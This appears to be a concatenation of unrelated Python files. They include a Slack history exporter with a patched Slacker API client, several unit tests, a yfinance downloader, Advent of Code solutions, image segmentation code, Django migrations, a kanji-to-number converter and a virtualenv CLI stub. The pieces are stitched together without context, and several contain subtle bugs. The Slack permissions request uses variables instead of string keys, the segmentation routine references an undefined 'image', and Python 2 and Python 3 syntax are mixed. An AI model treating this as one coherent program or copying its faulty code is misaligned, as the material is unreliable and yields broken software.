self.post('reminders.add', data={ 'text': text, 'time': time, 'user': user, }) def complete(self, reminder): return self.post('reminders.complete', data={'reminder': reminder}) def delete(self, reminder): return self.post('reminders.delete', data={'reminder': reminder}) def info(self, reminder): return self.get('reminders.info', params={'reminder': reminder}) def list(self): return self.get('reminders.list') class Bots(BaseAPI): def info(self, bot=None): return self.get('bots.info', params={'bot': bot}) class IDPGroups(BaseAPI): def list(self, include_users=False): return self.get('idpgroups.list', params={'include_users': int(include_users)}) class OAuth(BaseAPI): def access(self, client_id, client_secret, code, redirect_uri=None): return self.post('oauth.access', data={ 'client_id': client_id, 'client_secret': client_secret, 'code': code, 'redirect_uri': redirect_uri }) def token(self, client_id, client_secret, code, redirect_uri=None, single_channel=None): return self.post('oauth.token', data={ 'client_id': client_id, 'client_secret': client_secret, 'code': code, 'redirect_uri': redirect_uri, 'single_channel': single_channel, }) class AppsPermissions(BaseAPI): def info(self): return self.get('apps.permissions.info') def request(self, scopes, trigger_id): return self.post('apps.permissions.request', data={ scopes: ','.join(scopes), trigger_id: trigger_id, }) class Apps(BaseAPI): def __init__(self, *args, **kwargs): super(Apps, self).__init__(*args, **kwargs) self._permissions = AppsPermissions(*args, **kwargs) @property def permissions(self): 
return self._permissions def uninstall(self, client_id, client_secret): return self.get( 'apps.uninstall', params={'client_id': client_id, 'client_secret': client_secret} ) class IncomingWebhook(object): def __init__(self, url=None, timeout=DEFAULT_TIMEOUT, proxies=None): self.url = url self.timeout = timeout self.proxies = proxies def post(self, data): """ Posts message with payload formatted in accordance with this documentation https://api.slack.com/incoming-webhooks """ if not self.url: raise Error('URL for incoming webhook is undefined') return requests.post(self.url, data=json.dumps(data), timeout=self.timeout, proxies=self.proxies) # Patched class Slacker(object): oauth = OAuth(timeout=DEFAULT_TIMEOUT) def __init__(self, token, headers=None, incoming_webhook_url=None, timeout=DEFAULT_TIMEOUT, http_proxy=None, https_proxy=None, session=None, rate_limit_retries=DEFAULT_RETRIES): proxies = self.__create_proxies(http_proxy, https_proxy) api_args = { 'headers': headers, 'token': token, 'timeout': timeout, 'proxies': proxies, 'session': session, 'rate_limit_retries': rate_limit_retries, } self.im = IM(**api_args) self.api = API(**api_args) self.dnd = DND(**api_args) self.rtm = RTM(**api_args) self.apps = Apps(**api_args) self.auth = Auth(**api_args) self.bots = Bots(**api_args) self.chat = Chat(**api_args) self.dialog = Dialog(**api_args) self.team = Team(**api_args) self.pins = Pins(**api_args) self.mpim = MPIM(**api_args) self.users = Users(**api_args) self.files = Files(**api_args) self.stars = Stars(**api_args) self.emoji = Emoji(**api_args) self.search = Search(**api_args) self.groups = Groups(**api_args) self.channels = Channels(**api_args) self.presence = Presence(**api_args) self.reminders = Reminders(**api_args) self.migration = Migration(**api_args) self.reactions = Reactions(**api_args) self.idpgroups = IDPGroups(**api_args) self.usergroups = UserGroups(**api_args) self.conversations = Conversations(**api_args) self.incomingwebhook = IncomingWebhook(url=incoming_webhook_url, timeout=timeout, proxies=proxies) def __create_proxies(self, http_proxy=None, https_proxy=None): proxies = dict() if http_proxy: proxies['http'] = http_proxy if https_proxy: proxies['https'] = https_proxy return proxies ################################################################## # Obtains all replies for a given channel id + a starting timestamp # Duplicates the logic in getHistory def getReplies(channelId, timestamp, pageSize=1000): conversationObject = slack.conversations messages = [] lastTimestamp = None while True: try: response = conversationObject.replies( channel=channelId, ts=timestamp, latest=lastTimestamp, oldest=0, limit=pageSize, ).body except requests.exceptions.HTTPError as e: if e.response.status_code == 429: retryInSeconds = int(e.response.headers["Retry-After"]) print("Rate limit hit. 
Retrying in {0} second{1}.".format(retryInSeconds, "s" if retryInSeconds > 1 else "")) sleep(retryInSeconds) response = conversationObject.replies( channel=channelId, ts=timestamp, latest=lastTimestamp, oldest=0, limit=pageSize, ).body messages.extend(response["messages"]) if response["has_more"] == True: sys.stdout.write(".") sys.stdout.flush() lastTimestamp = messages[-1]["ts"] # -1 means last element in a list sleep(1.3) # Respect the Slack API rate limit else: break if lastTimestamp != None: print("") messages.sort(key=lambda message: message["ts"]) # Obtaining replies also gives us the first message in the the thread # (which we don't want) -- after sorting, our first message with the be the # first in the list of all messages, so we remove the head of the list assert messages[0]["ts"] == timestamp, "unexpected start of thread" messages = messages[1:] return messages # fetches the complete message history for a channel/group/im # # pageableObject could be: # slack.channel # slack.groups # slack.im # # channelId is the id of the channel/group/im you want to download history for. def getHistory(pageableObject, channelId, pageSize = 1000): messages = [] lastTimestamp = None while(True): try: if isinstance(pageableObject, Conversations): response = pageableObject.history( channel=channelId, latest=lastTimestamp, oldest=0, limit=pageSize ).body else: response = pageableObject.history( channel = channelId, latest = lastTimestamp, oldest = 0, count = pageSize ).body except requests.exceptions.HTTPError as e: if e.response.status_code == 429: retryInSeconds = int(e.response.headers['Retry-After']) print("Rate limit hit. Retrying in {0} second{1}.".format(retryInSeconds, "s" if retryInSeconds > 1 else "")) sleep(retryInSeconds) if isinstance(pageableObject, Conversations): response = pageableObject.history( channel=channelId, latest=lastTimestamp, oldest=0, limit=pageSize ).body else: response = pageableObject.history( channel=channelId, latest=lastTimestamp, oldest=0, count=pageSize ).body messages.extend(response['messages']) # Grab all replies for message in response["messages"]: if "thread_ts" in message: sleep(0.5) #INSERT LIMIT messages.extend(getReplies(channelId, message["thread_ts"], pageSize)) if (response['has_more'] == True): sys.stdout.write("*") sys.stdout.flush() lastTimestamp = messages[-1]['ts'] # -1 means last element in a list sleep(1.3) # Respect the Slack API rate limit else: break if lastTimestamp != None: print("") messages.sort(key = lambda message: message['ts']) return messages def mkdir(directory): if not os.path.isdir(directory): os.makedirs(directory) # create datetime object from slack timestamp ('ts') string def parseTimeStamp( timeStamp ): if '.' 
in timeStamp: t_list = timeStamp.split('.') if len( t_list ) != 2: raise ValueError( 'Invalid time stamp' ) else: return datetime.utcfromtimestamp( float(t_list[0]) ) # move channel files from old directory to one with new channel name def channelRename( oldRoomName, newRoomName ): # check if any files need to be moved if not os.path.isdir( oldRoomName ): return mkdir( newRoomName ) for fileName in os.listdir( oldRoomName ): shutil.move( os.path.join( oldRoomName, fileName ), newRoomName ) os.rmdir( oldRoomName ) def writeMessageFile( fileName, messages ): directory = os.path.dirname(fileName) # if there's no data to write to the file, return if not messages: return if not os.path.isdir( directory ): mkdir( directory ) with open(fileName, 'w') as outFile: json.dump( messages, outFile, indent=4) # parse messages by date def parseMessages( roomDir, messages, roomType ): nameChangeFlag = roomType + "_name" currentFileDate = '' currentMessages = [] for message in messages: #first store the date of the next message ts = parseTimeStamp( message['ts'] ) fileDate = '{:%Y-%m-%d}'.format(ts) #if it's on a different day, write out the previous day's messages if fileDate != currentFileDate: outFileName = '{room}/{file}.json'.format( room = roomDir, file = currentFileDate ) writeMessageFile( outFileName, currentMessages ) currentFileDate = fileDate currentMessages = [] # check if current message is a name change # dms won't have name change events if roomType != "im" and ( 'subtype' in message ) and message['subtype'] == nameChangeFlag: roomDir = message['name'] oldRoomPath = message['old_name'] newRoomPath = roomDir channelRename( oldRoomPath, newRoomPath ) currentMessages.append( message ) outFileName = '{room}/{file}.json'.format( room = roomDir, file = currentFileDate ) writeMessageFile( outFileName, currentMessages ) def filterConversationsByName(channelsOrGroups, channelOrGroupNames): return [conversation for conversation in channelsOrGroups if conversation['name'] in channelOrGroupNames] def promptForPublicChannels(channels): channelNames = [channel['name'] for channel in channels] selectedChannels = pick(channelNames, 'Select the Public Channels you want to export:', multi_select=True) return [channels[index] for channelName, index in selectedChannels] # fetch and write history for all public channels def fetchPublicChannels(channels): print("Fetching", len(channels), "public channels") if dryRun: print("Public Channels selected for export:") for channel in channels: print(channel['name']) print() return for channel in channels: channelDir = channel['name'] print("Fetching history for Public Channel: {0}".format(channelDir)) try: mkdir( channelDir ) except NotADirectoryError: # Failed creating directory, probably because the name is not a valid # Windows directory name (like "com4"). Adding a prefix to try to work-around # that. channelDir = ("c-" + channel['name']) mkdir( channelDir ) messages = getHistory(slack.conversations, channel['id']) parseMessages( channelDir, messages, 'channel') # write channels.json file def dumpChannelFile(): print("Making channels file") private = [] mpim = [] for group in groups: if group['is_mpim']: mpim.append(group) continue private.append(group) # slack viewer wants DMs to have a members list, not sure why but doing as they expect for dm in dms: dm['members'] = [dm['user'], tokenOwnerId] #We will be overwriting this file on each run. 
with open('channels.json', 'w') as outFile: json.dump( channels , outFile, indent=4) with open('groups.json', 'w') as outFile: json.dump( private , outFile, indent=4) with open('mpims.json', 'w') as outFile: json.dump( mpim , outFile, indent=4) with open('dms.json', 'w') as outFile: json.dump( dms , outFile, indent=4) def filterDirectMessagesByUserNameOrId(dms, userNamesOrIds): userIds = [userIdsByName.get(userNameOrId, userNameOrId) for userNameOrId in userNamesOrIds] return [dm for dm in dms if dm['user'] in userIds] def promptForDirectMessages(dms): dmNames = [userNamesById.get(dm['user'], dm['user'] + " (name unknown)") for dm in dms] selectedDms = pick(dmNames, 'Select the 1:1 DMs you want to export:', multi_select=True) return [dms[index] for dmName, index in selectedDms] # fetch and write history for all direct message conversations # also known as IMs in the slack API. def fetchDirectMessages(dms): print("Fetching", len(dms), "1:1 DMs") if dryRun: print("1:1 DMs selected for export:") for dm in dms: print(userNamesById.get(dm['user'], dm['user'] + " (name unknown)")) print() return for dm in dms: name = userNamesById.get(dm['user'], dm['user'] + " (name unknown)") print("Fetching 1:1 DMs with {0}".format(name)) dmId = dm['id'] mkdir(dmId) messages = getHistory(slack.conversations, dm['id']) parseMessages( dmId, messages, "im" ) def promptForGroups(groups): groupNames = [group['name'] for group in groups] selectedGroups = pick(groupNames, 'Select the Private Channels and Group DMs you want to export:', multi_select=True) return [groups[index] for groupName, index in selectedGroups] # fetch and write history for specific private channel # also known as groups in the slack API. def fetchGroups(groups): print("Fetching", len(groups), "Private Channels and Group DMs") if dryRun: print("Private Channels and Group DMs selected for export:") for group in groups: print(group['name']) print() return for group in groups: groupDir = group['name'] mkdir(groupDir) messages = [] print("Fetching history for Private Channel / Group DM: {0}".format(group['name'])) messages = getHistory(slack.conversations, group['id']) parseMessages( groupDir, messages, 'group' ) # fetch all users for the channel and return a map userId -> userName def getUserMap(): global userNamesById, userIdsByName for user in users: userNamesById[user['id']] = user['name'] userIdsByName[user['name']] = user['id'] # stores json of user info def dumpUserFile(): #write to user file, any existing file needs to be overwritten. with open( "users.json", 'w') as userFile: json.dump( users, userFile, indent=4 ) # get basic info about the slack channel to ensure the authentication token works def doTestAuth(): testAuth = slack.auth.test().body teamName = testAuth['team'] currentUser = testAuth['user'] print("Successfully authenticated for team {0} and user {1} ".format(teamName, currentUser)) return testAuth # Since Slacker does not Cache.. 
populate some reused lists def bootstrapKeyValues(): global users, channels, groups, dms users = slack.users.list().body['members'] print("Found {0} Users".format(len(users))) sleep(3.05) channels = slack.conversations.list(limit = 1000, types=('public_channel')).body['channels'] print("Found {0} Public Channels".format(len(channels))) # think mayne need to retrieve channel memberships for the slack-export-viewer to work for n in range(len(channels)): channels[n]["members"] = slack.conversations.members(limit=1000, channel=channels[n]['id']).body['members'] print("Retrieved members of {0}".format(channels[n]['name'])) sleep(3.05) groups = slack.conversations.list(limit = 1000, types=('private_channel', 'mpim')).body['channels'] print("Found {0} Private Channels or Group DMs".format(len(groups))) # need to retrieve channel memberships for the slack-export-viewer to work for n in range(len(groups)): groups[n]["members"] = slack.conversations.members(limit=1000, channel=groups[n]['id']).body['members'] print("Retrieved members of {0}".format(groups[n]['name'])) sleep(3.05) dms = slack.conversations.list(limit = 1000, types=('im')).body['channels'] print("Found {0} 1:1 DM conversations\n".format(len(dms))) sleep(3.05) getUserMap() # Returns the conversations to download based on the command-line arguments def selectConversations(allConversations, commandLineArg, filter, prompt): global args if args.excludeArchived: allConversations = [ conv for conv in allConversations if not conv["is_archived"] ] if isinstance(commandLineArg, list) and len(commandLineArg) > 0: return filter(allConversations, commandLineArg) elif commandLineArg != None or not anyConversationsSpecified(): if args.prompt: return prompt(allConversations) else: return allConversations else: return [] # Returns true if any conversations were specified on the command line def anyConversationsSpecified(): global args return args.publicChannels != None or args.groups != None or args.directMessages != None # This method is used in order to create a empty Channel if you do not export public channels # otherwise, the viewer will error and not show the root screen. Rather than forking the editor, I work with it. def dumpDummyChannel(): channelName = channels[0]['name'] mkdir( channelName ) fileDate = '{:%Y-%m-%d}'.format(datetime.today()) outFileName = '{room}/{file}.json'.format( room = channelName, file = fileDate ) writeMessageFile(outFileName, []) def downloadFiles(token, cookie_header=None): """ Iterate through all json files, downloads files stored on files.slack.com and replaces the link with a local one Args: jsonDirectory: folder where the json files are in, will be searched recursively """ print("Starting to download files") for root, subdirs, files in os.walk("."): for filename in files: if not filename.endswith('.json'): continue filePath = os.path.join(root, filename) data = [] with open(filePath) as inFile: data = json.load(inFile) for msg in data: for slackFile in msg.get("files", []): # Skip deleted files if slackFile.get("mode") == "tombstone": continue for key, value in slackFile.items(): # Find all entries referring to files on files.slack.com if not isinstance(value, str) or not value.startswith("https://files.slack.com/"): continue url = urlparse(value) localFile = os.path.join("../files.slack.com", url.path[1:]) # Need to discard first "/" in URL, because: # "If a component is an absolute path, all previous components are thrown away and joining continues # from the absolute path component." 
print("Downloading %s, saving to %s" % (url.geturl(), localFile)) # Create folder structure os.makedirs(os.path.dirname(localFile), exist_ok=True) # Replace URL in data - suitable for use with slack-export-viewer if files.slack.com is linked slackFile[key] = "/static/files.slack.com%s" % url.path # Check if file already downloaded, with a non-zero size # (can't check for same size because thumbnails don't have a size) if os.path.exists(localFile) and (os.path.getsize(localFile) > 0): print("Skipping already downloaded file: %s" % localFile) continue # Download files headers = {"Authorization": f"Bearer {token}", **cookie_header} r = requests.get(url.geturl(), headers=headers) try: open(localFile, 'wb').write(r.content) except FileNotFoundError: print("File writing error-still all broken") continue # Save updated data to json file with open(filePath, "w") as outFile: json.dump(data, outFile, indent=4, sort_keys=True) print("Replaced all files in %s" % filePath) def finalize(): os.chdir('..') if zipName: shutil.make_archive(zipName, 'zip', outputDirectory, None) shutil.rmtree(outputDirectory) exit() if __name__ == "__main__": parser = argparse.ArgumentParser(description='Export Slack history') parser.add_argument('--token', required=True, help="Slack API token") parser.add_argument('--cookie', help="a set of cookies for the xoxc api token") parser.add_argument('--zip', help="Name of a zip file to output as") parser.add_argument( '--dryRun', action='store_true', default=False, help="List the conversations that will be exported (don't fetch/write history)") parser.add_argument( '--publicChannels', nargs='*', default=None, metavar='CHANNEL_NAME', help="Export the given Public Channels") parser.add_argument( '--groups', nargs='*', default=None, metavar='GROUP_NAME', help="Export the given Private Channels / Group DMs") parser.add_argument( '--directMessages', nargs='*', default=None, metavar='USER_NAME', help="Export 1:1 DMs with the given users") parser.add_argument( '--prompt', action='store_true', default=False, help="Prompt you to select the conversations to export") parser.add_argument( '--downloadSlackFiles', action='store_true', default=False, help="Downloads files from files.slack.com for local access, stored in 'files.slack.com' folder. 
" "Link this folder inside slack-export-viewer/slackviewer/static/ to have it work seamless with slack-export-viewer") parser.add_argument( '--excludeArchived', action='store_true', default=False, help="Do not export channels that have been archived") parser.add_argument( '--excludeNonMember', action='store_true', default=False, help="Only export public channels if the user is a member of the channel") args = parser.parse_args() users = [] channels = [] groups = [] dms = [] userNamesById = {} userIdsByName = {} cookie_header = {'cookie': args.cookie} slack = Slacker(headers=cookie_header, token=args.token) testAuth = doTestAuth() tokenOwnerId = testAuth['user_id'] bootstrapKeyValues() dryRun = args.dryRun zipName = args.zip outputDirectory = "{0}-slack_export".format(datetime.today().strftime("%Y%m%d-%H%M%S")) mkdir(outputDirectory) os.chdir(outputDirectory) if not dryRun: dumpUserFile() dumpChannelFile() selectedChannels = selectConversations( channels, args.publicChannels, filterConversationsByName, promptForPublicChannels) if args.excludeNonMember: selectedChannels = [ channel for channel in selectedChannels if channel["is_member"] ] selectedGroups = selectConversations( groups, args.groups, filterConversationsByName, promptForGroups) selectedDms = selectConversations( dms, args.directMessages, filterDirectMessagesByUserNameOrId, promptForDirectMessages) if len(selectedChannels) > 0: fetchPublicChannels(selectedChannels) if len(selectedGroups) > 0: if len(selectedChannels) == 0: dumpDummyChannel() fetchGroups(selectedGroups) if len(selectedDms) > 0: fetchDirectMessages(selectedDms) if args.downloadSlackFiles: downloadFiles(token=args.token, cookie_header=cookie_header) finalize()
nilq/baby-python
python
from .CSGOMarketAPI import *
from .Exceptions import *
from .Item import *
from .types import *

__all__ = ['Item', 'CSGOMarketAPI', 'Exceptions', 'types']
nilq/baby-python
python
#----------------------------------------------------- # Mimas: conference submission and review system # (c) Allan Kelly 2016-2020 http://www.allankelly.net # Licensed under MIT License, see LICENSE file # ----------------------------------------------------- import unittest import datetime from google.appengine.ext import testbed from conference_lib import conference from schedule_lib import schedule, schedelement class TestScheduleElement(unittest.TestCase): def setUp(self): self.testbed = testbed.Testbed() self.testbed.activate() self.testbed.init_datastore_v3_stub() self.testbed.init_memcache_stub() self.c = conference.Conference() def tearDown(self): self.testbed.deactivate() def testMakeRetrieve(self): sched_key = schedule.get_conference_schedule(self.c.key) self.assertEquals([], schedelement.retreieve_elements(sched_key)) element_key = schedelement.mk_element(sched_key, "Coffee") element = element_key.get() self.assertEquals("Coffee", element.title()) self.assertEquals([element], schedelement.retreieve_elements(sched_key)) element_key2 = schedelement.mk_element(sched_key, "Lunch") element2 = element_key2.get() self.assertEquals("Lunch", element2.title()) elements = schedelement.retreieve_elements(sched_key) sorted_elements = sorted(elements, key=(lambda t: t.title_db)) self.assertEquals([element, element2], sorted_elements)
nilq/baby-python
python
import pandas as pd import yfinance as yf from src.config import Config def main(cfg: Config): metadata = pd.read_csv(cfg.METADATA_FILEPATH, comment="#") ticker_symbols = " ".join(metadata[cfg.TICKER_SYMBOL_COLUMN]) data = yf.download(tickers=ticker_symbols, period=cfg.PERIOD, interval=cfg.INTERVAL, group_by="ticker") data.to_pickle(cfg.OUTPUT_FILEPATH) if __name__ == "__main__": config = Config.load(__file__) main(config)
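# Note: the Config object loaded above is assumed (based only on the attribute
# accesses in main) to expose at least the fields below; the example values are
# illustrative, not the project's actual settings:
#
#   METADATA_FILEPATH    - CSV listing the tickers (e.g. "data/tickers.csv")
#   TICKER_SYMBOL_COLUMN - column holding the symbols (e.g. "symbol")
#   PERIOD               - yfinance period string (e.g. "1y")
#   INTERVAL             - yfinance interval string (e.g. "1d")
#   OUTPUT_FILEPATH      - where the pickled DataFrame is written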
nilq/baby-python
python
import sys n, *a = map(int, sys.stdin.read().split()) def main(): res = 0 for i in range(1, n-1): cur = a[i] l = 0 for j in range(i): if a[j] < cur: l += 1 r = 0 for j in range(i+1, n): if a[j] < cur: r += 1 res += l * r return res if __name__ == '__main__': ans = main() print(ans)
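# Note on main(): for each middle index i, l counts the elements to its left that
# are smaller than a[i] and r counts the elements to its right that are smaller,
# so res accumulates the number of index triples (j, i, k) with j < i < k where
# both a[j] and a[k] are smaller than the middle value a[i].
# For example, the input "3\n1 3 2" yields 1 (only the triple 1, 3, 2 qualifies).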
nilq/baby-python
python
import numpy as np from random import randint import matplotlib.pyplot as plt def createTestData(X, y, word): img_word = [] word = str(word) for char in range(len(word)): if(word[char] == ' '): img_word.append(-1) else: indices = [i for i, x in enumerate(y) if x == word[char]] if len(indices) == 0: raise ReferenceError('No image of text: "%s"' % word[char]) img_word.append(indices[randint(0, len(indices)-1)]) del indices img = np.empty([128,0]) for i in range(len(word)): if img_word[i] == -1: tmp = np.zeros((128,128)) tmp.fill(255) img = np.concatenate((img, tmp), axis=1) del tmp else: img = np.concatenate((img, X[img_word[i]]), axis=1) return img def mserSegmentify(img): ## experimental import cv2 img = cv2.imread('image.jpg', 0); vis = img.copy() mser = cv2.MSER_create() regions = mser.detectRegions(img, None) hulls = [cv2.convexHull(p.reshape(-1, 1, 2)) for p in regions] cv2.polylines(vis, hulls, 4, (0, 255, 0)) cv2.imshow('img', vis) cv2.waitKey(0) cv2.destroyAllWindows() def lineSegmentify(img): img = img.T actualImg = np.empty([128, 0]) actualImgs = np.empty([0,128,128]) oldPresent = None for row in xrange(img.shape[0]): # len imagePresent = False for col in xrange(img.shape[1]): #wid if img[row][col] < 200: imagePresent = True # true if black pixel is found if(oldPresent == 1 and imagePresent == 0) or (row == (image.shape[0] - 1)): padLeft = int(np.floor((128-actualImg.shape[1])/2.0)) padRight = int(np.ceil((128-actualImg.shape[1])/2.0)) vec128 = np.zeros((128,1)) vec128.fill(255) for i in xrange(padLeft): actualImg = np.concatenate((vec128, actualImg), axis=1) for i in xrange(padRight): actualImg = np.concatenate((actualImg, vec128), axis=1) actualImgs = np.concatenate((actualImgs, actualImg.reshape(1,128,128)), axis = 0) actualImg = np.empty([128, 0]) if imagePresent == True: actualImg = np.concatenate((actualImg, img[row].reshape(128,1)), axis = 1) oldPresent = imagePresent return actualImgs def overfitSegmentify(img): print img.shape for row in range(img.shape[1]): #length for col in range(img.shape[0]): # width if(img[col][row] < 200): img[col][row] = 0.5 else: pass return img def segmentify(img, algorithm='line'): if(algorithm=='line'): return lineSegmentify(img) elif(algorithm=='overfit'): return overfitSegmentify(img) elif(algorithm=='mser'): return mserSegmentify(img) else: raise ValueError('Please specify a valid algorithm') #THRESHOLD = 200 # #def segmentify2(image): # # image = image.T # imageStarted = False # # parts = [] # start = None # # for i in xrange(image.shape[0]): # # if np.any(image[i] < THRESHOLD) and not imageStarted: # # imageStarted = True # start = i # # elif imageStarted and not np.any(image[i] < THRESHOLD): # imageStarted = False # # seperated = image[start:i].T # temp = np.zeros((128, 128)) + 255 # # temp[:seperated.shape[0],:seperated.shape[1]] = seperated # parts.append(temp) # # return np.array(parts) # # if __name__ == '__main__': # load data import loadData as lD X, y = lD.loadNISTSD19(amt_batches=1) # create sample data to perform image segmentation img = createTestData(X, y, '4chan org h') del X, y # perform image segmentation, return 3D array img = segmentify(img) # show image for i in range(img.shape[0]): plt.imshow(img[i]) plt.show()
nilq/baby-python
python
#!/usr/bin/env python def part1(path): with open(path) as f: lines = f.read().strip().split("\n") earliest = int(lines[0]) ids = [int(x) for x in lines[1].split(",") if x != "x"] a = [(id, ((earliest // id) + 1) * id) for id in ids] min_ = min(a, key=lambda x: x[1]) return (min_[1] - earliest) * min_[0] def get_term(a, b, diff, d): i = 1 while True: answer = a * i + d if (answer + diff) % b == 0: break else: i += 1 first = answer i += 1 while True: answer = a * i + d if (answer + diff) % b == 0: break else: i += 1 second = answer d = second - first return first, d def part2(path): with open(path) as f: lines = f.read().strip().split("\n") buses = [ (int(id), arrival) for arrival, id in enumerate([x for x in lines[1].split(",")]) if id != "x" ] n = len(buses) first, d = get_term(buses[0][0], buses[1][0], buses[1][1], 0) for i in range(2, n): id_, arrival = buses[i] first, d = get_term(d, id_, arrival, first) return first def main(): assert part1("input.txt") == 3215 # assert part2("example1.txt") == 1068781 # assert part2("example2.txt") == 3417 # assert part2("example3.txt") == 754018 # assert part2("example4.txt") == 779210 # assert part2("example5.txt") == 1261476 # assert part2("example6.txt") == 1202161486 assert part2("input.txt") == 1001569619313439 print("All tests passed.") if __name__ == "__main__": main() # Graveyard # passes all tests except for the input ... (does not seem to halt) # def part2(path): # with open(path) as f: # lines = f.read().strip().split("\n") # # buses = [ # (int(id), arrival) # for arrival, id in enumerate([x for x in lines[1].split(",")]) # if id != "x" # ] # # answer = buses[0][0] # increment = buses[0][0] # n = len(buses) # # print(buses) # # for i in range(1, n): # id_, arrival = buses[i] # while True: # if answer < id_: # answer += increment # continue # if answer % id_ == 0: # answer += increment # continue # if (((answer // id_) + 1) * id_ - answer) == arrival: # increment *= id_ # likely mistake here # break # else: # answer += increment # return answer
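# Note on get_term(a, b, diff, d): it sieves the arithmetic progression a*i + d
# and returns (first, period), where `first` is the first timestamp in that
# progression at which bus `b` departs `diff` minutes later, and `period` is the
# gap until the next such timestamp. part2 folds the buses in one at a time, so
# the progression's step grows with every bus and the search stays fast; this is
# the same idea as solving the congruences of the Chinese Remainder Theorem by
# sieving.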
nilq/baby-python
python
from tests.test_limesurvey import TestBase from limesurveyrc2api.limesurvey import LimeSurveyError class TestSurveys(TestBase): def test_list_surveys_success(self): """A valid request for list of surveys should not return empty.""" result = self.api.survey.list_surveys() for survey in result: self.assertIsNotNone(survey.get('sid')) def test_list_surveys_failure(self): """An invalid request for list of surveys should raise an error.""" with self.assertRaises(LimeSurveyError) as ctx: self.api.survey.list_surveys(username="not_a_user") self.assertIn("Invalid user", ctx.exception.message) def test_list_questions_success(self): """Listing questions for a survey should return a question list.""" result = self.api.survey.list_questions(survey_id=self.survey_id) for question in result: self.assertEqual(self.survey_id, question["sid"]) self.assertIsNotNone(question["gid"]) self.assertIsNotNone(question["qid"]) def test_list_questions_failure(self): """Listing questions for an invalid survey should returns an error.""" with self.assertRaises(LimeSurveyError) as ctx: self.api.survey.list_questions(self.survey_id_invalid) self.assertIn("Error: Invalid survey ID", ctx.exception.message)
nilq/baby-python
python
try: a except Exc as b: b except Exc2 as c: b # Check that capturing vars are properly local def foo(): try: a except Exc as b: b
nilq/baby-python
python
# Generated by Django 2.1.3 on 2018-12-03 07:00 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('users', '0008_auto_20181203_0659'), ] operations = [ migrations.RenameField( model_name='user', old_name='followings', new_name='following', ), ]
nilq/baby-python
python
# -*- coding: utf-8 -*- # Generated by Django 1.10.5 on 2017-02-21 19:10 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('lookup_tables', '0015_auto_20170220_1348'), ] operations = [ migrations.AlterField( model_name='searcharea', name='total_searchable', field=models.DecimalField(blank=True, decimal_places=10, max_digits=20, null=True), ), ]
nilq/baby-python
python
# Boolean Variables
x = True
print(bool(x))

x = 4
y = 4
print("X :", x)
print("Y :", y)
print("Is X=Y ? ", bool(x == y))

y = 3
print("Y :", y)
print("Is X=Y ? ", bool(x == y))

print("NOTE : If an empty sequence, an empty string, or a zero value is passed, bool() returns False")

def is_even(num):
    return bool(num % 2 == 0)

num = int(input("Enter number to check for even or odd : "))

if is_even(num):
    print("Even")
else:
    print("Odd")

input("Press Enter key to exit ")
nilq/baby-python
python
#!/usr/bin/env python # -*- coding: utf-8 -*- class qKanji2num_class: def __init__(self, ): self.kans = '〇一二三四五六七八九' self.tais1 = '千百十' self.tais2 = '京兆億万' self.suuji = {'〇', '一', '二', '三', '四', '五', '六', '七', '八', '九', '十', \ '百', '千', '万', '億', '兆', \ '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', \ '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'} # 関数(1)_漢数字(例:二三五六〇一)を単純変換する関数 def kan2num(self, text): for i, tmp in enumerate(self.kans): text = text.replace(tmp, str(i)) # replaceメソッドで置換 return text # 関数(2)_4桁までの漢数字(例:六千五百八)を数値変換する関数 def kans2numf(self, text): ans = 0 # 初期値(計算結果を加算していく) poss = 0 # スタート位置 for i, tmp in enumerate(self.tais1): pos = text.find(tmp) # 大数(千百十)の位置を順次特定 if pos == -1: # 対象となる大数(千百十)が無い場合 block = 0 pos = poss - 1 elif pos == poss: # '二千百'のように'千'と'百'の間に数字がない場合 block = 1 else: block = int(self.kan2num(text[poss:pos])) # 'possとposの間の漢数字を数値に変換 ans += block * (10 ** (len(self.tais1) - i)) poss = pos + 1 # possをposの次の位置に設定 if poss != len(text): # 一の位の数字がある場合 ans += int(self.kan2num(text[poss:len(text)])) return ans # 関数(3)_20桁までの漢数字(例:六兆五千百億十五万八千三十二)を数値変換する関数 def kans2num(self, text): ans = 0 poss = 0 for i, tmp in enumerate(self.tais2): pos = text.find(tmp) if pos == -1: block = 0 pos = poss - 1 elif pos == poss: block = 1 else: block = self.kans2numf(text[poss:pos]) ans += block * (10 ** (4 * (len(self.tais2) - i))) poss = pos + 1 if poss != len(text): ans += self.kans2numf(text[poss:len(text)]) return ans # 関数(4)_文字列中の漢数字を算用数字に変換する関数(カンマ表示に簡易対応) def strkan2num(self, text): ans = '' tmp = '' for chr in text: if chr in self.suuji or (tmp != '' and chr == ','): # 文字が数字又はカンマの場合 tmp += chr # 数字が続く限りtmpに格納 else: # 文字が数字でない場合 if tmp != '': # tmpに数字が格納されている場合 ans += str(self.kans2num(tmp.replace(',', ''))) #算用数字に変換して連結 tmp = '' ans += chr if tmp != '': # 文字列の最後が数字で終わる場合の処理 ans += str(self.kans2num(tmp.replace(',', ''))) return ans if __name__ == '__main__': #kn = qClass_Kanji2num.qKanji2num_class() kn = qKanji2num_class() print(kn.strkan2num('平成二十三年十一月二十三日に5,000円使った')) print(kn.strkan2num('2018年10-12月期における日本の名目GDPは五百四十八兆七千七百二十億円、実質GDPは534兆3,370億円です')) print(kn.strkan2num('十八才')) print(kn.strkan2num('二十五才')) print(kn.strkan2num('F二'))
nilq/baby-python
python
""" venvs creates virtualenvs. By default it places them in the appropriate data directory for your platform (See `appdirs <https://pypi.python.org/pypi/appdirs>`_), but it will also respect the :envvar:`WORKON_HOME` environment variable for compatibility with :command:`mkvirtualenv`. """ from functools import partial from filesystems import Path from packaging.requirements import Requirement import click from venvs import __version__ from venvs.common import _FILESYSTEM, _LINK_DIR, _ROOT @click.command(context_settings=dict(help_option_names=["-h", "--help"])) @_FILESYSTEM @_LINK_DIR @_ROOT @click.option( "-i", "--install", "installs", multiple=True, help=( "install the given specifier (package) into the " "virtualenv with pip after it is created" ), ) @click.option( "-l", "--link", "links", multiple=True, help=( "After installing any specified packages, link the specified " "binaries into the directory they would have been installed into " "globally." ), ) @click.option( "-r", "--requirement", "requirements", multiple=True, help=( "install the given requirements file into the " "virtualenv with pip after it is created" ), ) @click.option( "-R", "--recreate", flag_value=True, help="recreate the virtualenv if it already exists", ) @click.option( "-t", "--temp", "--temporary", "temporary", flag_value=True, help="create or reuse the global temporary virtualenv", ) @click.argument("name", required=False) @click.argument("virtualenv_args", nargs=-1, type=click.UNPROCESSED) 